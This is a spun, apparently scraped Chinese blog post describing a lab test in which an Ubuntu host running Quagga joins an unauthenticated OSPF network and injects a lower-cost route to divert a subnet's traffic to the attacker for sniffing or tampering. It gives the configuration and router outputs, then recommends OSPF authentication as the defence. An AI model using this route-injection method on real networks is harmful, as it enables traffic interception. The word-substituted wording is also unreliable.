OSPF刺进歹意路由***测验51CTO博客 - 凯发娱乐

OSPF刺进歹意路由***测验51CTO博客

2019年02月22日10时46分24秒 | 作者: 亚美 | 标签: 路由,办法,测验 | 浏览: 1741

 前语:关于动态路由协议的***,向来是***注重的方针,OSPF协议作为园区网络中较为常见的路由协议,其装备的安全性和重要性天然显而易见。怎么有用防护OSPF的安全隐患,更多的网管往往将方针投向了路由器本身安全,习惯性的以为只需路由器保护得够安全,网络就够安全。其实,安全一向一来都是认识的竞赛而技能仅仅是其间的表象。今日,咱们就来看看一个简略的ospf刺进歹意路由的办法。   模型:本次试验,咱们选用dynamips模仿路由器,vmware+ubuntu模仿***方,***程序选用一个装置在ubuntu上的开源的路由软件quagga。拓扑如下: 模型中,R0和R1是本来收敛完结的ospf路由,经过一台二层交流机衔接,这是园区网络十分常见的办法;咱们经过在交流机上接入一台计算机C0,运转相应的程序,将R0本来指向R1的172.16.0.2的路由指向咱们的***端C0。   原理:ospf的路由挑选算法不在此赘述,简而言之。咱们其实没有使用什么缝隙,而是针对没有设置校验的ospf路由进行握手和邻接,随后选用最小cost的办法强行压入路由。   前期预备: 路由器部分用dynamips,这儿不再赘述用法,咱们装备好的两台设备现已收敛完结,两台路由器选用f0/0链接交互ospf,此外R1新敞开f0/1,用以将路由信息更新至R0,信息如下: R0:
R0#sh ip int bri
Interface                  IP-Address      OK? Method Status                Protocol
FastEthernet0/0            192.168.0.251   YES NVRAM  up                    up     
FastEthernet0/1            unassigned      YES NVRAM  administratively down down 
R0#sh ip ospf ne Neighbor ID     Pri   State           Dead Time   Address         Interface
192.168.0.249     1   FULL/BDR        00:00:36    192.168.0.249   FastEthernet0/0 R0#sh ip route
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route Gateway of last resort is not set      172.16.0.0/24 is subnetted, 1 subnets
O       172.16.0.0 [110/20] via 192.168.0.249, 00:09:42, FastEthernet0/0
C    192.168.0.0/24 is directly connected, FastEthernet0/0
R1:
R1#sh ip ospf ne Neighbor ID     Pri   State           Dead Time   Address         Interface
192.168.0.251     1   FULL/DR         00:00:30    192.168.0.251   FastEthernet0/0
R1#sh ip int bri
Interface                  IP-Address      OK? Method Status                Protocol
FastEthernet0/0            192.168.0.249   YES NVRAM  up                    up     
FastEthernet0/1            172.16.0.2      YES NVRAM  up                    up
 
R1#sh ip route 
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route Gateway of last resort is not set      172.16.0.0/24 is subnetted, 1 subnets
C       172.16.0.0 is directly connected, FastEthernet0/1
C    192.168.0.0/24 is directly connected, FastEthernet0/0
***渠道方面,咱们在虚拟机里架好ubuntu体系,IP地址为192.168.0.186;随后在在软件源里挑选quagga,装置进程同任何依据“新立得”更新的软件。 装完后进入/usr/share/doc/quagga/examples,这是装备典范,咱们挑选ospfd.conf.sample,copy至/etc/quagga下,偏重命名为ospfd.conf; 然后进入/etc/quagga下,批改daemons,把里边的zebra和ospf等号右边的no都改成yes,保存,封闭。 (水煮豆豆注:这儿的zebra是quagga的主模块,用来监控整个路由状况和添加静态路由等。假如需求运转其他路由协议,也请将相应的文档从examples拷贝到quagga下,并敞开daemons内相应的协议) 咱们可以悄悄看下ospfd和zebra的装备文件,你会发现十分了解,由于里边用的语法仿cisco的风格,很像一个路由器的装备文件。 在这个目录下还有一个debian.conf,这儿可以装备各个路由进程绑定的IP,假如你不做任何批改(默许127.0.0.1),那么quagga发动后,将只能在本地telnet;而假如和我相同计划在网络上恣意方位telnet的话,咱们可以批改IP地址为相应地址:   随后咱们发动quagga进程,将会发现体系敞开的新端口,这儿2601是zebra开的,2604是ospf开的。   咱们别离telnet进去,得到装备。
zebra# sh run Current configuration:
!
hostname zebra
password zebra
enable password zebra
!
interface eth0
ipv6 nd suppress-ra
!
interface lo
!
interface pan0
ipv6 nd suppress-ra
!
!
!
!
line vty
!
end
ospfd# sh run Current configuration:
!
hostname ospfd
password zebra
log stdout
!
!
!
interface eth0
!
interface lo
!
interface pan0
!
!
line vty
!
end
这样,咱们就可以用十分了解的cisco语法来装备路由器的,可是有人或许会利诱,两个窗口咱们应该这么区别呢? 简略的可以理解为,ospfd是专门设置和ospf有关的信息的;而zebra则专管路由信息的检查,静态路由设置等等。   ***开端: 咱们首先在ospfd中做如下装备,发动和别的两台ospf的洽谈进程。
router ospf
network 172.16.0.0/16 area 0.0.0.0
network 192.168.0.0/24 area 0.0.0.0
此刻,R0和R1应该收到ospf信息,而且开端ospf握手和洽谈,由于之前现已挑选出DR和BDR,因而咱们终究参加的被设置成DROTHER:
R0#sh ip ospf ne Neighbor ID     Pri   State           Dead Time   Address         Interface
192.168.0.186     1   FULL/DROTHER    00:00:35    192.168.0.186   FastEthernet0/0
192.168.0.249     1   FULL/BDR        00:00:32    192.168.0.249   FastEthernet0/0 R1#sh ip ospf ne Neighbor ID     Pri   State           Dead Time   Address         Interface
192.168.0.186     1   FULL/DROTHER    00:00:35    192.168.0.186   FastEthernet0/0
192.168.0.251     1   FULL/DR         00:00:33    192.168.0.251   FastEthernet0/0
咱们看quagga中的状况:
zebra# sh ip route
Codes: K - kernel route, C - connected, S - static, R - RIP, O - OSPF,
       I - ISIS, B - BGP, > - selected route, * - FIB route K>* 0.0.0.0/0 via 192.168.0.1, eth0
C>* 127.0.0.0/8 is directly connected, lo
K>* 169.254.0.0/16 is directly connected, eth0
O   172.16.0.0/24 [110/12] via 192.168.0.249, eth0, 00:12:27
O   192.168.0.0/24 [110/2] is directly connected, eth0, 00:12:27
C>* 192.168.0.0/24 is directly connected, eth0 这儿很多人或许没见过K,K表明kernel,这是quagga表明ubuntu体系的路由和接口信息时用的。
可以看到,quagga也收到了来自R1的ospf路由。 (水煮豆豆注:假如没有构成邻接联系,请检查一下dynamips的双工问题,我在这个当地卡了比较久,原因是dynamips模仿的设备和我本地的交流机存在双工不同步,然后影响了路由器之间的洽谈,形成超时失效,终究经过debug发现的,解决办法是在dynamips的路由器里相应的接口设置双工。) 接下来咱们正式施行***,这儿有两种思路,一种是在zebra内设置静态路由:ip route 172.16.0.0/24 192.168.0.186(也可以写成ip route 172.16.0.0/24 eth0);别的一种办法是在ubuntu网卡上直接设置新的ip地址172.16.0.2。 这儿咱们先测验办法二: 在ubuntu的网卡内添加172.16.0.2: 一起,在ospfd内添加如下装备:
interface eth0
ip ospf cost 1(这儿也不一定非要1,只需比正常的开支小就行)
router ospf (需求将本地路由重散布到ospf中去,这样才干更新到R1和R0上)
redistribute kernel  (这条没有测验是否为有必要,可是一旦敞开就会将zebra中标志为K的条目发送出去)
redistribute connected (办法二需求)
redistribute static (办法一需求)
此刻更新现已发送出去,且由于cost比较小,将被R0选用为最优途径: 发送前:
R0#sh ip route
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route Gateway of last resort is not set      172.16.0.0/24 is subnetted, 1 subnets
O       172.16.0.0 [110/20] via 192.168.0.249, 00:09:42, FastEthernet0/0
C    192.168.0.0/24 is directly connected, FastEthernet0/0
发送后:
R0#sh ip route
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route Gateway of last resort is not set O E2 169.254.0.0/16 [110/20] via 192.168.0.186, 00:04:55, FastEthernet0/0(这条是redistribute kernel传递出来的)
     172.16.0.0/24 is subnetted, 1 subnets
O       172.16.0.0 [110/11] via 192.168.0.186, 00:04:55, FastEthernet0/0
C    192.168.0.0/24 is directly connected, FastEthernet0/0
留意其间的cost,R1的为20,咱们发送的为11,其实是10+1,其间10是网络带宽花费,由于vmware模仿的网卡为10M,由于100/10=10;1就是咱们设置的接口cost值。 这样,R0将本来发往R1的数据将发往C0,也就是咱们的***端,这样不管是嗅探数据,或许假造后再转发回R1,乃至频频更新路由引起拥塞,都是可以考虑的***办法。 然后咱们谈谈办法一,之所以将办法一放在后面讲,是由于这种办法是不成功的,终究无法诈骗R0,那是由于假如敞开zebra的静态路由:ip route 172.16.0.0/24 192.168.0.186;咱们在封闭R1的f0/1接口的状况下,可以看到R0:
R0# sh ip route
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route Gateway of last resort is not set      172.16.0.0/24 is subnetted, 1 subnets
O E2    172.16.0.0 [110/20] via 192.168.0.186, 00:11:56, FastEthernet0/0
C    192.168.0.0/24 is directly connected, FastEthernet0/0
可以看到此刻重散布进来一条E2的路由,而依据ospf的协议,重散布进OSPF的路由默以为E2,Cost=20,且传递进程中不改动COST。 而R1更新过来的路由类型为O,依据ospf的路由优先准则:O > O IA > O E1 > O E2 的优先级次序转发,因而,只需R1存在172.16.0.0的路由,不管何时存在,都将替换***方的歹意路由,咱们方才为了演示上表封闭了f0/1,咱们从头翻开。作用如下:
R0# sh ip route
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route Gateway of last resort is not set      172.16.0.0/24 is subnetted, 1 subnets
O       172.16.0.0 [110/20] via 192.168.0.249, 00:00:01, FastEthernet0/0
C    192.168.0.0/24 is directly connected, FastEthernet0/0
可以看到路由被正确的更新覆盖了。因而无法选用办法一的办法完成***。   总述:本次测验的***十分简略,其实就是使用了ospf协议特性的正常功用的不正常完成,站在***者的视点看,应该还能研究出更多的办法,而站在网管的视点,不管多少办法,在本例中敞开路由认证和校验是根绝针对ospf***的好办法;从长远看,坚持安全警觉认识,了解安全形势改变,盯梢***技能演化,结合硬件侦测手法时间批改网内安全防护等级,才是真实治标又治本的解决方案。咱们有理由信任一个久经考验的路由协议可以应对常见的***行为,也期望相似的测验可以引起网管的注重,真实领会到安全认识高于防护技能的实质。
版权声明
本文来源于网络,版权归原作者所有,其内容与观点不代表凯发娱乐立场。转载文章仅为传播更有价值的信息,如采编人员采编有误或者版权原因,请与我们联系,我们核实后立即修改或删除。

猜您喜欢的文章